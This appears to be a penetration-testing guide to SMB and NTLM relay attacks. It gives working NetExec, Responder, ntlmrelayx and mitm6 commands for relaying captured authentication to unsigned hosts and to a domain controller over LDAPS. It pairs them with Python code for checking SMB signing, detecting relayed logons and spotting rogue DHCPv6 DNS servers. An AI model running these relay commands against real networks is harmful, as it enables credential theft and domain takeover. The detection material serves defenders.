# SMB Relaying

An SMB relay attack is performed when an attacker can capture a user's NTLM hash in transit and pass it on to another machine that has SMB signing disabled. The goal of this attack is to relay a user account that has higher privileges than the attacker currently holds. Ideally this would be a domain or local administrator, whose privileges can then be used for further attack paths.

Note that SMB signing must be disabled (or at least not required) on the relayed targets. When signing is required, the target can tell that you are not really the user being relayed: the relayed packets cannot be signed, because the attacker never obtains the session key, so the target refuses to let you authenticate.

## NetExec (find relay targets)

The first step in SMB relaying is finding hosts that can be relayed to. NetExec can generate a list of targets for use with SMB relaying: hosts where SMB signing is not required.

* <https://github.com/Pennyw0rth/NetExec>

The following command writes the list of relayable hosts to a file:

`netexec smb --gen-relay-list <targets.txt> <IP_Address/range>`

Equipped with this list, you can move on to using the tools below.
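As an added example (not part of this page and not NetExec's own code), the check that `--gen-relay-list` performs, written out in Python: parse the `SecurityMode` field of an SMB2 NEGOTIATE response and list the hosts that do not require signing. The field offsets and flag values follow MS-SMB2; the packet bytes are constructed here rather than read from the network, and every function name is this example's own.

```python
"""
Classify SMB2 NEGOTIATE responses by their SecurityMode field. A server that
does not set SMB2_NEGOTIATE_SIGNING_REQUIRED accepts unsigned sessions and is
therefore a relay target. Offsets follow MS-SMB2 2.2.1 (header) and 2.2.4
(NEGOTIATE response); packets below are constructed, not captured.
"""
import struct

SMB2_MAGIC = b"\xfeSMB"
SMB2_HEADER_LEN = 64
SMB2_NEGOTIATE = 0x0000
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001

# SecurityMode flags (MS-SMB2 2.2.4)
SIGNING_ENABLED = 0x0001
SIGNING_REQUIRED = 0x0002


def parse_negotiate_response(packet: bytes) -> dict:
    """Return SecurityMode and DialectRevision from a raw SMB2 NEGOTIATE response."""
    if len(packet) < SMB2_HEADER_LEN + 6:
        raise ValueError("packet too short for an SMB2 NEGOTIATE response")
    if packet[:4] != SMB2_MAGIC:
        raise ValueError("not an SMB2 message")
    # Header at offset 4: StructureSize(2) CreditCharge(2) Status(4) Command(2)
    structure_size, _credit_charge, status, command = struct.unpack_from("<HHIH", packet, 4)
    if structure_size != 64 or command != SMB2_NEGOTIATE:
        raise ValueError("not a NEGOTIATE message")
    flags = struct.unpack_from("<I", packet, 16)[0]
    if not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        raise ValueError("message is a request, not a response")
    if status != 0:
        raise ValueError(f"NEGOTIATE failed with NTSTATUS 0x{status:08x}")
    # Body: StructureSize(2) SecurityMode(2) DialectRevision(2) ...
    body_size, security_mode, dialect = struct.unpack_from("<HHH", packet, SMB2_HEADER_LEN)
    if body_size != 65:
        raise ValueError("unexpected NEGOTIATE response structure size")
    return {"security_mode": security_mode, "dialect": dialect}


def is_relay_target(security_mode: int) -> bool:
    """A host is relayable unless it requires signing on every session."""
    return not security_mode & SIGNING_REQUIRED


def describe_security_mode(security_mode: int) -> str:
    if security_mode & SIGNING_REQUIRED:
        return "signing required"
    if security_mode & SIGNING_ENABLED:
        return "signing enabled but not required"
    return "signing disabled"


def gen_relay_list(responses: dict) -> list:
    """Mimic --gen-relay-list: hosts whose NEGOTIATE response allows unsigned sessions."""
    targets = []
    for host, packet in responses.items():
        try:
            info = parse_negotiate_response(packet)
        except ValueError:
            continue  # not SMB2 or malformed: cannot judge, so do not list it
        if is_relay_target(info["security_mode"]):
            targets.append(host)
    return targets


def build_negotiate_response(security_mode: int, dialect: int = 0x0311) -> bytes:
    """Construct a minimal SMB2 NEGOTIATE response (sample data for this example)."""
    header = SMB2_MAGIC + struct.pack(
        "<HHIHHIIQIIQ16s",
        64, 0, 0, SMB2_NEGOTIATE, 1, SMB2_FLAGS_SERVER_TO_REDIR,
        0, 0, 0, 0, 0, b"\x00" * 16,
    )
    body = struct.pack(
        "<HHHH16sIIIIQQHHI",
        65, security_mode, dialect, 0, b"\x00" * 16,
        0, 0x800000, 0x800000, 0x800000, 0, 0, 128, 0, 0,
    ) + b"\x00"  # one-byte Buffer placeholder
    return header + body


if __name__ == "__main__":
    # Constructed sample: a hardened file server and two workstations.
    sample = {
        "10.0.0.5": build_negotiate_response(SIGNING_ENABLED | SIGNING_REQUIRED),
        "10.0.0.21": build_negotiate_response(SIGNING_ENABLED),
        "10.0.0.22": build_negotiate_response(0),
    }
    for host, packet in sample.items():
        mode = parse_negotiate_response(packet)["security_mode"]
        print(host, describe_security_mode(mode))
    print("relay targets:", gen_relay_list(sample))
```

The same field is what a defender reads when auditing: any host reported as "signing enabled but not required" or "signing disabled" is one where the policy `Microsoft network server: Digitally sign communications (always)` is not enforced.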

## IPv4 Relaying - Responder + ntlmrelayx.py

Responder is a tool that can be set up to act as a listener on your local subnet and watch for victim machines initiating NTLMv1/v2 authentication requests. Once a request is intercepted, it is passed to ntlmrelayx, which relays the authentication to the target machine.

If the relayed account is a standard domain user, an SMB shell on the target is spawned. If the account has local administrative privileges on the target machine, many further attacks become possible, such as dumping the SAM database to obtain local password hashes.

* <https://github.com/lgandx/Responder>
* <https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py>

**To set up relaying, run Responder with its SMB and HTTP servers disabled:**

* Edit the **/responder/Responder.conf** file
  * Disable SMB (`SMB = Off`)
  * Disable HTTP (`HTTP = Off`)

Execute Responder with the following command:

`responder -I eth0 -v`

**The following command will execute ntlmrelayx with a list of target hosts to relay to:**

`ntlmrelayx.py -tf <IPs.txt> -smb2support -i`

With Responder and ntlmrelayx running, you should now see authentication requests being relayed.
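The defensive counterpart to the relay described above, as an added example that is not from this page, Responder or impacket: a detection rule over Windows Security event 4624 records. In an NTLM network logon the `WorkstationName` field is whatever the client put in its NTLM AUTHENTICATE message, while `IpAddress` is the actual TCP peer; when ntlmrelayx relays a victim's authentication, the target therefore logs the victim's workstation name alongside the attacker's address. Comparing the two against an inventory of expected addresses exposes the mismatch. The inventory and the event records are constructed, and the function names are this example's own.

```python
"""
Relay indicator over Security event 4624 records: flag NTLM network logons
whose client-reported WorkstationName does not belong to the source IpAddress.
Events and inventory below are constructed for this example.
"""

# Constructed inventory of the expected IPv4 address per workstation name
# (in practice sourced from DHCP leases or an asset database).
INVENTORY = {"WS01": "10.0.0.21", "WS02": "10.0.0.22", "FS01": "10.0.0.5"}

# Constructed 4624 records, reduced to the fields the rule needs.
EVENTS = [
    {"EventID": 4624, "Computer": "FS01", "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "LmPackageName": "NTLM V2", "WorkstationName": "WS01", "IpAddress": "10.0.0.21",
     "TargetUserName": "jsmith"},
    {"EventID": 4624, "Computer": "FS01", "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "LmPackageName": "NTLM V2", "WorkstationName": "WS02", "IpAddress": "10.0.0.99",
     "TargetUserName": "svc_backup"},
    {"EventID": 4624, "Computer": "FS01", "LogonType": 3, "AuthenticationPackageName": "Kerberos",
     "LmPackageName": "-", "WorkstationName": "-", "IpAddress": "10.0.0.22",
     "TargetUserName": "jdoe"},
    {"EventID": 4624, "Computer": "FS01", "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "LmPackageName": "NTLM V1", "WorkstationName": "WS01", "IpAddress": "10.0.0.21",
     "TargetUserName": "jsmith"},
]


def relay_indicators(event: dict, inventory: dict) -> list:
    """Return the reasons a single 4624 record looks like a relayed NTLM logon."""
    if event.get("EventID") != 4624 or event.get("LogonType") != 3:
        return []
    if event.get("AuthenticationPackageName") != "NTLM":
        return []  # Kerberos logons are not what a relay produces
    reasons = []
    workstation = event.get("WorkstationName", "-")
    ip = event.get("IpAddress", "-")
    expected = inventory.get(workstation)
    if expected is not None and expected != ip:
        reasons.append(f"workstation {workstation} expected at {expected}, logon came from {ip}")
    if event.get("LmPackageName") == "NTLM V1":
        reasons.append("legacy NTLMv1 authentication observed")
    return reasons


def find_relay_candidates(events: list, inventory: dict) -> list:
    """Run the rule over a batch of records and return one alert per suspicious logon."""
    alerts = []
    for event in events:
        reasons = relay_indicators(event, inventory)
        if reasons:
            alerts.append({"host": event["Computer"], "user": event["TargetUserName"],
                           "ip": event["IpAddress"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in find_relay_candidates(EVENTS, INVENTORY):
        print(f"{alert['host']}: {alert['user']} from {alert['ip']} -> {'; '.join(alert['reasons'])}")
```

The workstation/IP mismatch is the strongest single indicator, but it depends on the inventory being current; hosts that roam between addresses need their leases refreshed in the inventory or they will produce false positives.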

## IPv6 Relaying - MITM6 + ntlmrelayx.py

MITM6 (Man-In-The-Middle6) is an IPv6 tool that exploits Windows machines by taking over the role of the default DNS server, which works because Windows prefers IPv6 over IPv4. Acting as the DNS server, MITM6 selectively replies to DNS queries of the attacker's choosing and redirects the victim's traffic to the attacker machine.

MITM6 is very powerful when paired with ntlmrelayx: because IPv6 takes precedence, the victims are forced to send their requests to us. This means we can aim for bigger things, namely relaying a domain administrator to a domain controller.

* <https://github.com/dirkjanm/mitm6>
* <https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py>

**The following command will execute MITM6 to start receiving requests:**

`mitm6 -i eth0 -d <domain>`

**The following command will execute ntlmrelayx and relay to a domain controller:**

To expand, this command relays the requests to LDAPS on a domain controller. It also serves the victim a fake WPAD file and dumps any gathered data into a folder called 'stuff' on the local system.

`ntlmrelayx -6 -t ldaps://<DomainControllerIP> -wh fwpad.domain.com -l stuff`
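How the DNS takeover above looks on the wire, and how to spot it, as an added example that is not from this page or from the mitm6 project: mitm6 answers clients' DHCPv6 Solicit messages and advertises itself as the DNS server through DHCPv6 option 23 (OPTION_DNS_SERVERS). Parsing DHCPv6 Advertise/Reply messages seen on a segment and comparing the offered resolvers with the sanctioned set flags the rogue server. On a network that runs no IPv6 at all, the sanctioned set is empty, so any advertised resolver is rogue. Message layout follows RFC 8415; the packets and the allow-list are constructed, and the function names are this example's own.

```python
"""
Detect a rogue IPv6 DNS server handed out over DHCPv6. Parse server messages,
extract OPTION_DNS_SERVERS (code 23, RFC 3646) and report resolvers that are
not sanctioned. All packets below are constructed for this example.
"""
import ipaddress
import struct

DHCPV6_SOLICIT = 1
DHCPV6_ADVERTISE = 2
DHCPV6_REPLY = 7
OPT_DNS_SERVERS = 23


def parse_dhcpv6(packet: bytes) -> tuple:
    """Return (msg_type, [(option_code, option_data), ...]) from a DHCPv6 message."""
    if len(packet) < 4:
        raise ValueError("DHCPv6 message shorter than its 4-byte header")
    msg_type = packet[0]
    options = []
    offset = 4  # skip msg-type(1) + transaction-id(3)
    while offset < len(packet):
        if offset + 4 > len(packet):
            raise ValueError("truncated option header")
        code, length = struct.unpack_from("!HH", packet, offset)
        offset += 4
        if offset + length > len(packet):
            raise ValueError(f"option {code} claims {length} bytes past end of packet")
        options.append((code, packet[offset:offset + length]))
        offset += length
    return msg_type, options


def advertised_dns_servers(packet: bytes) -> list:
    """DNS resolvers offered in a server message; empty for client messages."""
    msg_type, options = parse_dhcpv6(packet)
    if msg_type not in (DHCPV6_ADVERTISE, DHCPV6_REPLY):
        return []
    servers = []
    for code, data in options:
        if code != OPT_DNS_SERVERS:
            continue
        if len(data) % 16:
            raise ValueError("DNS server option length is not a multiple of 16")
        for i in range(0, len(data), 16):
            servers.append(str(ipaddress.IPv6Address(data[i:i + 16])))
    return servers


def rogue_dns_servers(packet: bytes, sanctioned: set) -> list:
    """Advertised resolvers that are not in the sanctioned set."""
    return [s for s in advertised_dns_servers(packet) if s not in sanctioned]


def build_dhcpv6(msg_type: int, options: list, transaction_id: bytes = b"\x00\x00\x01") -> bytes:
    """Construct a DHCPv6 message from (code, data) options (sample data only)."""
    out = bytes([msg_type]) + transaction_id
    for code, data in options:
        out += struct.pack("!HH", code, len(data)) + data
    return out


def dns_option(servers: list) -> bytes:
    """Encode a list of IPv6 addresses as OPTION_DNS_SERVERS payload."""
    return b"".join(ipaddress.IPv6Address(s).packed for s in servers)


if __name__ == "__main__":
    SANCTIONED = {"2001:db8::53"}  # constructed allow-list of real resolvers
    legit = build_dhcpv6(DHCPV6_ADVERTISE, [(OPT_DNS_SERVERS, dns_option(["2001:db8::53"]))])
    # A link-local resolver that nobody configured is the typical takeover signature.
    rogue = build_dhcpv6(DHCPV6_ADVERTISE, [(1, b"\x00\x01" + b"\x00" * 12),
                                            (OPT_DNS_SERVERS, dns_option(["fe80::1"]))])
    print("legit:", rogue_dns_servers(legit, SANCTIONED))
    print("rogue:", rogue_dns_servers(rogue, SANCTIONED))
```

Feeding this the DHCPv6 payloads from a capture on the client VLAN turns it into a standing check; the matching mitigation is to block inbound DHCPv6 on hosts where IPv6 is not used, and to disable WPAD so the fake proxy file in the command above is never requested.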

